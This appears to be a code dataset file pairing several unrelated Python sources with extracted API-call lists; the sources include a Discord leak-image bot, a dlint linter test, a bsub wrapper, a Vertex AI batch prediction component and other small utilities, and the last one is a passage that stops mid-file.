[((2041, 2096), 'LibcSearcher.LibcSearcher', 'LibcSearcher', (['"""__libc_start_main"""', 'libc_start_main_addr'], {}), "('__libc_start_main', libc_start_main_addr)\n", (2053, 2096), False, 'from LibcSearcher import LibcSearcher\n')]
|
import io
import json
import math
import random
import time
import traceback
from datetime import datetime
import aiofiles
import discord
import sanic
import sanic.response
from PIL import Image
from discord.ext import commands
from modules import leaks
async def handler(req):
return sanic.response.json(json.loads(await (await aiofiles.open(f'Cache/data/resp_leaks.json', mode='r')).read()))
async def generateleaks(data: dict, client: commands.Bot):
await (await aiofiles.open('Cache/data/leaks.json', mode='w+')).write(
json.dumps(data, indent=2))
start = time.time()
files = [await leaks.GenerateCard(i) for i in data["data"]["items"]]
if not files:
raise FileNotFoundError("No Images")
await client.get_channel(735018804169670687).send(f"New Leaks detected")
result = Image.new("RGBA", (
round(math.sqrt(len(files)) + 0.45) * 305 - 5, round(math.sqrt(len(files))) * 550 - 5))
result.paste(Image.open("assets/Images/Backgrounds/Background.png").resize(
(
int(round(math.sqrt(len(files)) + 0.45) * 305 - 5),
int(round(math.sqrt(len(files)) + 0.45) * 550 - 5)),
Image.ANTIALIAS))
x = -305
y = 0
count = 0
for img in files:
try:
img.thumbnail((305, 550), Image.ANTIALIAS)
w, h = img.size
if count >= round(math.sqrt(len(files)) + 0.45):
y += 550
x = -305
count = 0
x += 305
count += 1
result.paste(img, (x, y, x + w, y + h))
except:
continue
result.save("cdn/current/leaks.png", optimized=True)
uniqueimage = str(time.time())
result.save(f"cdn/unique/leaks_{uniqueimage}.png", optimize=True)
buffered = io.BytesIO()
result.save(buffered, format="PNG")
buffered.seek(0)
data = {
"url": "https://api.peely.de/cdn/current/leaks.png",
"uniqueurl": f"https://api.peely.de/cdn/unique/leaks_{uniqueimage}.png",
"time": str(datetime.utcnow().__format__('%A, %B %d, %Y'))
}
await (await aiofiles.open('Cache/data/resp_leaks.json', mode='w+')).write(
json.dumps(data, indent=2))
await client.get_channel(735018804169670687).send(
f"Updated Leaks. Generating Image in {round(time.time() - start, 2)}sec")
|
[
"io.BytesIO",
"aiofiles.open",
"modules.leaks.GenerateCard",
"PIL.Image.open",
"json.dumps",
"time.time",
"datetime.datetime.utcnow"
] |
[((586, 597), 'time.time', 'time.time', ([], {}), '()\n', (595, 597), False, 'import time\n'), ((1787, 1799), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (1797, 1799), False, 'import io\n'), ((1689, 1700), 'time.time', 'time.time', ([], {}), '()\n', (1698, 1700), False, 'import time\n'), ((546, 572), 'json.dumps', 'json.dumps', (['data'], {'indent': '(2)'}), '(data, indent=2)\n', (556, 572), False, 'import json\n'), ((617, 638), 'modules.leaks.GenerateCard', 'leaks.GenerateCard', (['i'], {}), '(i)\n', (635, 638), False, 'from modules import leaks\n'), ((2177, 2203), 'json.dumps', 'json.dumps', (['data'], {'indent': '(2)'}), '(data, indent=2)\n', (2187, 2203), False, 'import json\n'), ((957, 1011), 'PIL.Image.open', 'Image.open', (['"""assets/Images/Backgrounds/Background.png"""'], {}), "('assets/Images/Backgrounds/Background.png')\n", (967, 1011), False, 'from PIL import Image\n'), ((480, 529), 'aiofiles.open', 'aiofiles.open', (['"""Cache/data/leaks.json"""'], {'mode': '"""w+"""'}), "('Cache/data/leaks.json', mode='w+')\n", (493, 529), False, 'import aiofiles\n'), ((2036, 2053), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (2051, 2053), False, 'from datetime import datetime\n'), ((2106, 2160), 'aiofiles.open', 'aiofiles.open', (['"""Cache/data/resp_leaks.json"""'], {'mode': '"""w+"""'}), "('Cache/data/resp_leaks.json', mode='w+')\n", (2119, 2160), False, 'import aiofiles\n'), ((337, 391), 'aiofiles.open', 'aiofiles.open', (['f"""Cache/data/resp_leaks.json"""'], {'mode': '"""r"""'}), "(f'Cache/data/resp_leaks.json', mode='r')\n", (350, 391), False, 'import aiofiles\n'), ((2312, 2323), 'time.time', 'time.time', ([], {}), '()\n', (2321, 2323), False, 'import time\n')]
|
#!/usr/bin/env python
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import unittest
import dlint
class TestBadSysUse(dlint.test.base.BaseTest):
def test_bad_sys_usage(self):
python_string = self.get_ast_node(
"""
import sys
sys.call_tracing(lambda: 42, ())
sys.setprofile(lambda: 42)
sys.settrace(lambda: 42)
"""
)
linter = dlint.linters.BadSysUseLinter()
linter.visit(python_string)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=4,
col_offset=0,
message=dlint.linters.BadSysUseLinter._error_tmpl
),
dlint.linters.base.Flake8Result(
lineno=5,
col_offset=0,
message=dlint.linters.BadSysUseLinter._error_tmpl
),
dlint.linters.base.Flake8Result(
lineno=6,
col_offset=0,
message=dlint.linters.BadSysUseLinter._error_tmpl
),
]
assert result == expected
if __name__ == "__main__":
unittest.main()
|
[
"unittest.main",
"dlint.linters.base.Flake8Result",
"dlint.linters.BadSysUseLinter"
] |
[((1242, 1257), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1255, 1257), False, 'import unittest\n'), ((490, 521), 'dlint.linters.BadSysUseLinter', 'dlint.linters.BadSysUseLinter', ([], {}), '()\n', (519, 521), False, 'import dlint\n'), ((630, 741), 'dlint.linters.base.Flake8Result', 'dlint.linters.base.Flake8Result', ([], {'lineno': '(4)', 'col_offset': '(0)', 'message': 'dlint.linters.BadSysUseLinter._error_tmpl'}), '(lineno=4, col_offset=0, message=dlint.\n linters.BadSysUseLinter._error_tmpl)\n', (661, 741), False, 'import dlint\n'), ((812, 923), 'dlint.linters.base.Flake8Result', 'dlint.linters.base.Flake8Result', ([], {'lineno': '(5)', 'col_offset': '(0)', 'message': 'dlint.linters.BadSysUseLinter._error_tmpl'}), '(lineno=5, col_offset=0, message=dlint.\n linters.BadSysUseLinter._error_tmpl)\n', (843, 923), False, 'import dlint\n'), ((994, 1105), 'dlint.linters.base.Flake8Result', 'dlint.linters.base.Flake8Result', ([], {'lineno': '(6)', 'col_offset': '(0)', 'message': 'dlint.linters.BadSysUseLinter._error_tmpl'}), '(lineno=6, col_offset=0, message=dlint.\n linters.BadSysUseLinter._error_tmpl)\n', (1025, 1105), False, 'import dlint\n')]
|
#!/usr/bin/env python
"""Wrapper script with bsub functionality."""
from __future__ import print_function
import sys
import os
import shlex
import argparse
from submitjob import submitjob
from utility import color
def esub(args, bsubargs, jobscript):
"""Wrapper script with bsub functionality."""
data = {"command": ""}
scriptargs = []
for line in jobscript.splitlines(True):
if line.startswith("#!"):
data["command"] += line
elif line.startswith("#BSUB "):
scriptargs += shlex.split(line[6:].split("#")[0])
else:
data["command"] += line.split("#")[0]
bsubargs = scriptargs + bsubargs
last = False
cmd = False
for arg in bsubargs:
if cmd:
data["command"] += " " + arg
continue
if arg[0] == "-":
if last:
data[last] = True
last = arg
else:
if last:
data[last] = arg
last = False
else:
cmd = True
data["command"] = arg
if last:
data[last] = True
try:
jobid = submitjob(data)
print(jobid)
except Exception as e:
print(color(e.strerror, "r"))
sys.exit(-1)
def main():
"""Main program entry point."""
parser = argparse.ArgumentParser(
description="Wrapper for bsub."
)
parser.add_argument_group("further arguments",
description="are passed to bsub")
args, bsubargs = parser.parse_known_args()
jobscript = sys.stdin.read()
try:
esub(args, bsubargs, jobscript)
except KeyboardInterrupt:
pass
if __name__ == "__main__":
main()
|
[
"sys.stdin.read",
"argparse.ArgumentParser",
"utility.color",
"submitjob.submitjob",
"sys.exit"
] |
[((1340, 1396), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Wrapper for bsub."""'}), "(description='Wrapper for bsub.')\n", (1363, 1396), False, 'import argparse\n'), ((1591, 1607), 'sys.stdin.read', 'sys.stdin.read', ([], {}), '()\n', (1605, 1607), False, 'import sys\n'), ((1154, 1169), 'submitjob.submitjob', 'submitjob', (['data'], {}), '(data)\n', (1163, 1169), False, 'from submitjob import submitjob\n'), ((1264, 1276), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (1272, 1276), False, 'import sys\n'), ((1232, 1254), 'utility.color', 'color', (['e.strerror', '"""r"""'], {}), "(e.strerror, 'r')\n", (1237, 1254), False, 'from utility import color\n')]
|
import argparse
import numpy as np
import models
from utils import set_arch_name
model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
def config():
r"""configuration settings
"""
parser = argparse.ArgumentParser(description='Check model parameters')
parser.add_argument('-a', '--arch', metavar='ARCH', default='mobilenet',
choices=model_names,
help='model architecture: ' +
' | '.join(model_names) +
' (default: mobilenet)')
parser.add_argument('--layers', default=16, type=int, metavar='N',
help='number of layers in VGG/ResNet/ResNeXt/WideResNet (default: 16)')
parser.add_argument('--bn', '--batch-norm', dest='bn', action='store_true',
help='Use batch norm in VGG?')
parser.add_argument('--width-mult', default=1.0, type=float, metavar='WM',
help='width multiplier to thin a network '
'uniformly at each layer (default: 1.0)')
# for calculating number of pwkernel slice
parser.add_argument('-pwd', '--pw-bind-size', default=8, type=int, metavar='N',
dest='pw_bind_size',
help='the number of binding channels in pointwise convolution '
'(subvector size) (default: 8)')
cfg = parser.parse_args()
return cfg
def main():
opt = config()
# set model name
arch_name = set_arch_name(opt)
# calculate number of pwkernel slice
# model = models.__dict__[opt.arch](data='cifar10', num_layers=opt.layers,
# width_mult=opt.width_mult, batch_norm=opt.bn)
# w_kernel = model.get_weights_conv(use_cuda=False)
# for i in range(len(w_kernel)):
# print(np.shape(w_kernel[i]))
# w_pwkernel = model.get_weights_pwconv(use_cuda=False)
# d = opt.pw_bind_size
# sum_slices = 0
# sum_num_weights = 0
# for i in range(len(w_pwkernel)):
# c_out, c_in, _, _ = np.shape(w_pwkernel[i])
# num_weights = c_out * c_in
# sum_num_weights += num_weights
# if i == 0:
# num_slice = c_out * (c_in - d + 1)
# else:
# num_slice = c_out * (c_in // d)
# sum_slices += num_slice
# print('[{}-th layer] #weights: {} / #slices: {}'.format(i, num_weights, num_slice))
# print('\ntotal #weights: {} / total #slices (except ref_layer): {}'.format(sum_num_weights, sum_slices))
print('\n[ {}-cifar10 parameters ]'.format(arch_name))
model = models.__dict__[opt.arch](data='cifar10', num_layers=opt.layers,
width_mult=opt.width_mult, batch_norm=opt.bn)
# for name, param in model.named_parameters():
# if name.find('linear') != -1:
# print('{}: {}'.format(name, param.numel()))
# for name, param in model.named_parameters():
# print('{}: {}'.format(name, param.numel()))
num_params = sum(p.numel() for p in model.parameters())
num_trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
print('Number of all parameters: ', num_params)
print('Number of all trainable parameters: ', num_trainable_params)
print('\n[ {}-cifar100 parameters ]'.format(arch_name))
model = models.__dict__[opt.arch](data='cifar100', num_layers=opt.layers,
width_mult=opt.width_mult, batch_norm=opt.bn)
# for name, param in model.named_parameters():
# if name.find('linear') != -1:
# print('{}: {}'.format(name, param.numel()))
# for name, param in model.named_parameters():
# print('{}: {}'.format(name, param.numel()))
num_params = sum(p.numel() for p in model.parameters())
num_trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
print('Number of all parameters: ', num_params)
print('Number of trainable parameters: ', num_trainable_params)
# print('\n[ {}-imagenet parameters ]'.format(arch_name))
# model = models.__dict__[opt.arch](data='imagenet', num_layers=opt.layers,
# width_mult=opt.width_mult, batch_norm=opt.bn)
# for name, param in model.named_parameters():
# if name.find('linear') != -1:
# print('{}: {}'.format(name, param.numel()))
# for name, param in model.named_parameters():
# print('{}: {}'.format(name, param.numel()))
# num_params = sum(p.numel() for p in model.parameters())
# num_trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
# print('Number of all parameters: ', num_params)
# print('Number of trainable parameters: ', num_trainable_params)
if __name__ == '__main__':
main()
|
[
"utils.set_arch_name",
"argparse.ArgumentParser"
] |
[((297, 358), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Check model parameters"""'}), "(description='Check model parameters')\n", (320, 358), False, 'import argparse\n'), ((1605, 1623), 'utils.set_arch_name', 'set_arch_name', (['opt'], {}), '(opt)\n', (1618, 1623), False, 'from utils import set_arch_name\n')]
|
from django.shortcuts import render
from .models import InfoPage
# Create your views here.
def view_page(request, slug):
# Look up the slug.
page = InfoPage.objects.get(slug=slug)
page_data = {
"page": page
}
return render(request, 'infopages/view_page.html', page_data)
|
[
"django.shortcuts.render"
] |
[((244, 298), 'django.shortcuts.render', 'render', (['request', '"""infopages/view_page.html"""', 'page_data'], {}), "(request, 'infopages/view_page.html', page_data)\n", (250, 298), False, 'from django.shortcuts import render\n')]
|
"""
This component launches a Batch Prediction job on Vertex AI.
Know more about Vertex AI Batch Predictions jobs, go here:
https://cloud.google.com/vertex-ai/docs/predictions/batch-predictions.
"""
from google.cloud import storage
from tfx.dsl.component.experimental.annotations import Parameter, InputArtifact
from tfx.dsl.component.experimental.decorators import component
from tfx.types.standard_artifacts import String
import google.cloud.aiplatform as vertex_ai
from absl import logging
@component
def BatchPredictionGen(
gcs_source: InputArtifact[String],
project: Parameter[str],
location: Parameter[str],
model_resource_name: Parameter[str],
job_display_name: Parameter[str],
gcs_destination: Parameter[str],
instances_format: Parameter[str] = "file-list",
machine_type: Parameter[str] = "n1-standard-2",
accelerator_count: Parameter[int] = 0,
accelerator_type: Parameter[str] = None,
starting_replica_count: Parameter[int] = 1,
max_replica_count: Parameter[int] = 1,
):
"""
gcs_source: A location inside GCS to be used by the Batch Prediction job to get its inputs.
Rest of the parameters are explained here: https://git.io/JiUyU.
"""
storage_client = storage.Client()
# Read GCS Source (gcs_source contains the full path of GCS object).
# 1-1. get bucketname from gcs_source
gcs_source_uri = gcs_source.uri.split("//")[1:][0].split("/")
bucketname = gcs_source_uri[0]
bucket = storage_client.get_bucket(bucketname)
logging.info(f"bucketname: {bucketname}")
# 1-2. get object path without the bucket name.
objectpath = "/".join(gcs_source_uri[1:])
# 1-3. read the object to get value set by OutputArtifact from FileListGen.
blob = bucket.blob(objectpath)
logging.info(f"objectpath: {objectpath}")
gcs_source = f"gs://{blob.download_as_text()}"
# Get Model.
vertex_ai.init(project=project, location=location)
model = vertex_ai.Model.list(
filter=f"display_name={model_resource_name}", order_by="update_time"
)[-1]
# Launch a Batch Prediction job.
logging.info("Starting batch prediction job.")
logging.info(f"GCS path where file list is: {gcs_source}")
batch_prediction_job = model.batch_predict(
job_display_name=job_display_name,
instances_format=instances_format,
gcs_source=gcs_source,
gcs_destination_prefix=gcs_destination,
machine_type=machine_type,
accelerator_count=accelerator_count,
accelerator_type=accelerator_type,
starting_replica_count=starting_replica_count,
max_replica_count=max_replica_count,
sync=True,
)
logging.info(batch_prediction_job.display_name)
logging.info(batch_prediction_job.resource_name)
logging.info(batch_prediction_job.state)
|
[
"absl.logging.info",
"google.cloud.aiplatform.init",
"google.cloud.storage.Client",
"google.cloud.aiplatform.Model.list"
] |
[((1235, 1251), 'google.cloud.storage.Client', 'storage.Client', ([], {}), '()\n', (1249, 1251), False, 'from google.cloud import storage\n'), ((1524, 1565), 'absl.logging.info', 'logging.info', (['f"""bucketname: {bucketname}"""'], {}), "(f'bucketname: {bucketname}')\n", (1536, 1565), False, 'from absl import logging\n'), ((1785, 1826), 'absl.logging.info', 'logging.info', (['f"""objectpath: {objectpath}"""'], {}), "(f'objectpath: {objectpath}')\n", (1797, 1826), False, 'from absl import logging\n'), ((1901, 1951), 'google.cloud.aiplatform.init', 'vertex_ai.init', ([], {'project': 'project', 'location': 'location'}), '(project=project, location=location)\n', (1915, 1951), True, 'import google.cloud.aiplatform as vertex_ai\n'), ((2115, 2161), 'absl.logging.info', 'logging.info', (['"""Starting batch prediction job."""'], {}), "('Starting batch prediction job.')\n", (2127, 2161), False, 'from absl import logging\n'), ((2166, 2224), 'absl.logging.info', 'logging.info', (['f"""GCS path where file list is: {gcs_source}"""'], {}), "(f'GCS path where file list is: {gcs_source}')\n", (2178, 2224), False, 'from absl import logging\n'), ((2691, 2738), 'absl.logging.info', 'logging.info', (['batch_prediction_job.display_name'], {}), '(batch_prediction_job.display_name)\n', (2703, 2738), False, 'from absl import logging\n'), ((2743, 2791), 'absl.logging.info', 'logging.info', (['batch_prediction_job.resource_name'], {}), '(batch_prediction_job.resource_name)\n', (2755, 2791), False, 'from absl import logging\n'), ((2796, 2836), 'absl.logging.info', 'logging.info', (['batch_prediction_job.state'], {}), '(batch_prediction_job.state)\n', (2808, 2836), False, 'from absl import logging\n'), ((1964, 2059), 'google.cloud.aiplatform.Model.list', 'vertex_ai.Model.list', ([], {'filter': 'f"""display_name={model_resource_name}"""', 'order_by': '"""update_time"""'}), "(filter=f'display_name={model_resource_name}', order_by\n ='update_time')\n", (1984, 2059), True, 'import google.cloud.aiplatform as vertex_ai\n')]
|
# ----------------------------------------------------------------
# Copyright 2016 Cisco Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------
"""compare.py
return True if attributes in entity(lhs) = entity(rhs)
"""
import logging
from enum import Enum
from ydk.types import (Empty, Decimal64, FixedBitsDict,
YList, YListItem, YLeafList)
import sys
if sys.version_info > (3,):
long = int
LOGGER = logging.getLogger('ydk.tests.unittest')
LOGGER.setLevel(logging.DEBUG)
def is_builtin_type(attr):
# all the deridved types should have __cmp__ implemented
if (isinstance(attr, (int, bool, dict, str, int, long, float)) or
isinstance(attr, (Enum, Empty, Decimal64, FixedBitsDict)) or
isinstance(attr, (YLeafList, YListItem))):
return True
else:
return False
class ErrNo(Enum):
WRONG_VALUE = 0
WRONG_TYPES = 1
POPULATION_FAILED = 2
WRONG_DICT = 3
WRONG_DICT_VALUE = 4
WRONG_CLASS = 5
class ErrorMsg(object):
def __init__(self, lhs, rhs, errno):
self.lhs = lhs
self.rhs = rhs
self.errno = errno
def __str__(self):
rhs, lhs, errno = self.rhs, self.lhs, self.errno
errlhs = "\tlhs = %s, type: %s;\n" % (str(lhs), type(lhs))
errrhs = "\trhs = %s, type: %s;\n" % (str(rhs), type(rhs))
if errno == ErrNo.WRONG_VALUE:
errtyp = "Wrong value:\n"
elif errno == ErrNo.WRONG_TYPES:
errtyp = "Wrong types: not comparable\n"
elif errno == ErrNo.WRONG_CLASS:
errtyp = "Wrong types:\n"
elif errno == ErrNo.POPULATION_FAILED:
errtyp = "Failed population:\n"
elif errno == ErrNo.WRONG_DICT:
errtyp = "Wrong dict: different dictionary key\n"
return ''.join([errtyp, errlhs, errrhs])
def print_err(self):
error_str = str(self)
LOGGER.debug(error_str)
def is_equal(lhs, rhs):
ret, errtyp = True, None
if lhs is None and rhs is None or \
isinstance(lhs, list) and isinstance(rhs, list) and not lhs and not rhs:
pass
elif is_builtin_type(lhs) or is_builtin_type(rhs):
try:
if lhs != rhs and not _equal_enum(lhs, rhs):
errtyp, ret = ErrNo.WRONG_VALUE, False
except Exception:
errtyp, ret = ErrNo.WRONG_TYPES, False
elif lhs is None or rhs is None:
errtyp, ret = ErrNo.POPULATION_FAILED, False
elif isinstance(lhs, YList) and isinstance(rhs, YList) or \
isinstance(lhs, list) and isinstance(rhs, list):
if len(lhs) != len(rhs):
errtyp, ret = ErrNo.WRONG_VALUE, False
else:
cmp_lst = list(zip(lhs, rhs))
ret = True
for (left, right) in cmp_lst:
ret |= is_equal(left, right)
elif lhs.__class__ != rhs.__class__:
errtyp, ret = ErrNo.WRONG_CLASS, False
else:
dict_lhs, dict_rhs = lhs.__dict__, rhs.__dict__
len_lhs = len(dict_lhs)
len_rhs = len(dict_rhs)
if 'i_meta' in dict_lhs:
len_lhs -= 1
if 'i_meta' in dict_rhs:
len_rhs -= 1
if len_lhs != len_rhs:
errtyp, ret = ErrNo.WRONG_DICT, False
for k in dict_lhs:
if k == 'parent' or k == 'i_meta':
continue
elif is_builtin_type(dict_lhs[k]) or is_builtin_type(dict_rhs[k]):
try:
if dict_lhs[k] != dict_rhs[k] and not _equal_enum(dict_lhs[k], dict_rhs[k]):
lhs = dict_lhs[k]
rhs = dict_rhs[k]
errtyp, ret = ErrNo.WRONG_VALUE, False
except Exception:
errtyp, ret = ErrNo.WRONG_TYPES, False
elif k not in dict_rhs:
errtyp, ret = ErrNo.WRONG_DICT, False
elif not is_equal(dict_lhs[k], dict_rhs[k]):
ret = False
if ret is False and errtyp is not None:
err_msg = ErrorMsg(rhs, lhs, errtyp)
err_msg.print_err()
return ret
def _equal_enum(rhs, lhs):
return all((isinstance(rhs, Enum),
isinstance(lhs, Enum),
rhs.name == lhs.name))
|
[
"logging.getLogger"
] |
[((997, 1036), 'logging.getLogger', 'logging.getLogger', (['"""ydk.tests.unittest"""'], {}), "('ydk.tests.unittest')\n", (1014, 1036), False, 'import logging\n')]
|
#!/usr/bin/env python3
import numpy as np
import matplotlib.pyplot as plt
m = 1e-3
i_load = np.logspace(-5,-3)
i_load = np.linspace(1e-5,1e-3,200)
i_s = 1e-12
i_ph = 1e-3
V_T = 1.38e-23*300/1.6e-19
V_D = V_T*np.log((i_ph - i_load)/(i_s) + 1)
P_load = V_D*i_load
plt.subplot(2,1,1)
plt.plot(i_load/m,V_D)
plt.ylabel("Diode voltage [V]")
plt.grid()
plt.subplot(2,1,2)
plt.plot(i_load/m,P_load/m)
plt.xlabel("Current load [mA]")
plt.ylabel("Power Load [mW]")
plt.grid()
plt.savefig("pv.pdf")
plt.show()
|
[
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.show",
"numpy.log",
"matplotlib.pyplot.plot",
"numpy.logspace",
"numpy.linspace",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.grid",
"matplotlib.pyplot.savefig"
] |
[((94, 113), 'numpy.logspace', 'np.logspace', (['(-5)', '(-3)'], {}), '(-5, -3)\n', (105, 113), True, 'import numpy as np\n'), ((122, 152), 'numpy.linspace', 'np.linspace', (['(1e-05)', '(0.001)', '(200)'], {}), '(1e-05, 0.001, 200)\n', (133, 152), True, 'import numpy as np\n'), ((271, 291), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(1)'], {}), '(2, 1, 1)\n', (282, 291), True, 'import matplotlib.pyplot as plt\n'), ((290, 315), 'matplotlib.pyplot.plot', 'plt.plot', (['(i_load / m)', 'V_D'], {}), '(i_load / m, V_D)\n', (298, 315), True, 'import matplotlib.pyplot as plt\n'), ((314, 345), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Diode voltage [V]"""'], {}), "('Diode voltage [V]')\n", (324, 345), True, 'import matplotlib.pyplot as plt\n'), ((346, 356), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (354, 356), True, 'import matplotlib.pyplot as plt\n'), ((357, 377), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(2)'], {}), '(2, 1, 2)\n', (368, 377), True, 'import matplotlib.pyplot as plt\n'), ((376, 408), 'matplotlib.pyplot.plot', 'plt.plot', (['(i_load / m)', '(P_load / m)'], {}), '(i_load / m, P_load / m)\n', (384, 408), True, 'import matplotlib.pyplot as plt\n'), ((404, 435), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Current load [mA]"""'], {}), "('Current load [mA]')\n", (414, 435), True, 'import matplotlib.pyplot as plt\n'), ((436, 465), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Power Load [mW]"""'], {}), "('Power Load [mW]')\n", (446, 465), True, 'import matplotlib.pyplot as plt\n'), ((466, 476), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (474, 476), True, 'import matplotlib.pyplot as plt\n'), ((477, 498), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""pv.pdf"""'], {}), "('pv.pdf')\n", (488, 498), True, 'import matplotlib.pyplot as plt\n'), ((499, 509), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (507, 509), True, 'import matplotlib.pyplot as plt\n'), ((214, 247), 'numpy.log', 'np.log', (['((i_ph - i_load) / i_s + 1)'], {}), '((i_ph - i_load) / i_s + 1)\n', (220, 247), True, 'import numpy as np\n')]
|
import argparse
from pathlib import Path
from novel_tools.toolkit import analyze, docgen
from novel_tools.utils import get_config
def do_analyze(args):
config_filename = args.toolkit + '_config.json'
input_path = Path(args.input)
output_path = Path(args.output) if args.output is not None else None
if input_path.is_file():
in_dir = input_path.parent
config = get_config(config_filename, in_dir)
analyze(config, filename=input_path, out_dir=output_path)
else:
config = get_config(config_filename, input_path)
analyze(config, in_dir=input_path, out_dir=output_path)
def start():
parser = argparse.ArgumentParser(description='Novel Tools command line interface.')
subparsers = parser.add_subparsers(help='Tools provided by this package.', dest='command', required=True)
# Framework functions #
analyze_parser = subparsers.add_parser('analyze', description='Analyzes the novel file(s).')
analyze_parser.add_argument('-t', '--toolkit',
help='The toolkit that will be executed. Built-in toolkits include'
'struct, create, split, struct_dir, and create_dir. If a custom toolkit is given, '
'make sure to have <toolkit>_config.json under the input directory.')
analyze_parser.add_argument('-i', '--input',
help='Input filename or directory name. If it is a file, it will only be recognized by'
' TextReader, and it must contain the full path.')
analyze_parser.add_argument('-o', '--output', default=None, help='Output directory name.')
analyze_parser.set_defaults(func=do_analyze)
# generate_docs
doc_parser = subparsers.add_parser('docgen', description='Generates documentation for framework classes.')
doc_parser.add_argument('-c', '--config_filename', default=None,
help='Filename of the config which specifies additional packages.')
doc_parser.add_argument('-d', '--doc_filename', default=None, help='Filename of the output doc file.')
doc_parser.set_defaults(func=lambda a: docgen(a.config_filename, a.doc_filename))
args = parser.parse_args()
args.func(args)
if __name__ == '__main__':
start()
|
[
"argparse.ArgumentParser",
"novel_tools.toolkit.docgen",
"novel_tools.utils.get_config",
"novel_tools.toolkit.analyze",
"pathlib.Path"
] |
[((223, 239), 'pathlib.Path', 'Path', (['args.input'], {}), '(args.input)\n', (227, 239), False, 'from pathlib import Path\n'), ((655, 729), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Novel Tools command line interface."""'}), "(description='Novel Tools command line interface.')\n", (678, 729), False, 'import argparse\n'), ((258, 275), 'pathlib.Path', 'Path', (['args.output'], {}), '(args.output)\n', (262, 275), False, 'from pathlib import Path\n'), ((394, 429), 'novel_tools.utils.get_config', 'get_config', (['config_filename', 'in_dir'], {}), '(config_filename, in_dir)\n', (404, 429), False, 'from novel_tools.utils import get_config\n'), ((438, 495), 'novel_tools.toolkit.analyze', 'analyze', (['config'], {'filename': 'input_path', 'out_dir': 'output_path'}), '(config, filename=input_path, out_dir=output_path)\n', (445, 495), False, 'from novel_tools.toolkit import analyze, docgen\n'), ((523, 562), 'novel_tools.utils.get_config', 'get_config', (['config_filename', 'input_path'], {}), '(config_filename, input_path)\n', (533, 562), False, 'from novel_tools.utils import get_config\n'), ((571, 626), 'novel_tools.toolkit.analyze', 'analyze', (['config'], {'in_dir': 'input_path', 'out_dir': 'output_path'}), '(config, in_dir=input_path, out_dir=output_path)\n', (578, 626), False, 'from novel_tools.toolkit import analyze, docgen\n'), ((2193, 2234), 'novel_tools.toolkit.docgen', 'docgen', (['a.config_filename', 'a.doc_filename'], {}), '(a.config_filename, a.doc_filename)\n', (2199, 2234), False, 'from novel_tools.toolkit import analyze, docgen\n')]
|
from itertools import combinations
def get_data(filepath):
return [int(line) for line in open(filepath).readlines()]
def solve1(filepath, preamble):
inputs = get_data(filepath)
for i, line in enumerate(inputs):
if i <= preamble:
continue
sums = set(sum(comb) for comb in combinations(inputs[i-preamble:i], 2))
if line not in sums:
return line
def solve2(filepath, preamble):
target = solve1(filepath, preamble)
inputs = get_data(filepath)
for i, input1 in enumerate(inputs):
for i2, input2 in enumerate(inputs[i:]):
values = inputs[i:i2]
sum_ = sum(values)
if sum_ == target:
return min(values)+max(values)
if sum_ > target:
break
assert solve1('test', 5) == 127
print('Part 1: %d' % solve1('input', 25))
assert solve2('test', 5) == 62
print('Part 2: %s' % solve2('input', 25))
|
[
"itertools.combinations"
] |
[((313, 352), 'itertools.combinations', 'combinations', (['inputs[i - preamble:i]', '(2)'], {}), '(inputs[i - preamble:i], 2)\n', (325, 352), False, 'from itertools import combinations\n')]
|
import warnings
import signal
import sys, os, time
from rcpy._rcpy import initialize, cleanup, get_state
from rcpy._rcpy import set_state as _set_state
from rcpy._rcpy import cleanup as _cleanup
#from hanging_threads import start_monitoring
#monitoring_thread = start_monitoring()
# constants
IDLE = 0
RUNNING = 1
PAUSED = 2
EXITING = 3
# create pipes for communicating state
_RC_STATE_PIPE_LIST = []
def _get_state_pipe_list(p = _RC_STATE_PIPE_LIST):
return p
# creates pipes for communication
def create_pipe():
r_fd, w_fd = os.pipe()
_get_state_pipe_list().append((r_fd, w_fd))
return (r_fd, w_fd)
def destroy_pipe(pipe):
_get_state_pipe_list().remove(pipe)
(r_fd, w_fd) = pipe
os.close(r_fd)
os.close(w_fd)
# set state
def set_state(state):
# write to open pipes
for (r_fd, w_fd) in _get_state_pipe_list():
os.write(w_fd, bytes(str(state), 'UTF-8'))
# call robotics cape set_state
_set_state(state)
# cleanup function
_CLEANUP_FLAG = False
_cleanup_functions = {}
def add_cleanup(fun, pars):
global _cleanup_functions
_cleanup_functions[fun] = pars
def cleanup():
global _CLEANUP_FLAG
global _cleanup_functions
# return to avoid multiple calls to cleanup
if _CLEANUP_FLAG:
return
_CLEANUP_FLAG = True
print('Initiating cleanup...')
# call cleanup functions
for fun, pars in _cleanup_functions.items():
fun(*pars)
